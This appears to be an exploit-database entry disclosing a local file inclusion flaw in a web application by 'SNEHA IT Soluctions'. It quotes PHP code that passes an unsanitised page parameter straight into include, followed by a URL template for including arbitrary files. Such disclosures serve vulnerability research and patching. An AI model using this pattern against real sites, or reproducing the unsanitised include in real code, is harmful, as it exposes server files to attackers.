SNEHA IT Soluctions's LFI Vulnerabilities

2014-04-25T00:00:00
ID 1337DAY-ID-22179
Type zdt
Reporter cyberoot
Modified 2014-04-25T00:00:00

Description

Exploit for windows platform in category web applications

                                        
                                            --------------------[index.php]--------------------
  
           
$page = $_GET['page'];
if($page!="")
{	
    $p= $page;
}
else
{	
	echo "<script type='text/javascript'>window.location = 'index.php';</script>";
}
  
  
include SOURCES . $p;
  
  
--------------------[index.php]--------------------
  
So you can include a fil by doing ; http://[site]//template.php?page=[file]

#  0day.today [2018-04-05]  #